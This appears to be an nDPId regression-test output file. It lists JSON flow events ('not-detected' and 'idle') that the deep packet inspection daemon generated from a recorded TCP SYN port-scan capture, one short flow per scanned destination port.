-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1122,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1122,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1122,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1123,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1124,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1124,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1123,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1124,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1124,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5225,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5225,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5225,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5225,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1130,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5226,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5226,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1130,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5226,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5226,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1131,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1131,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1132,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1131,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1131,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1132,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
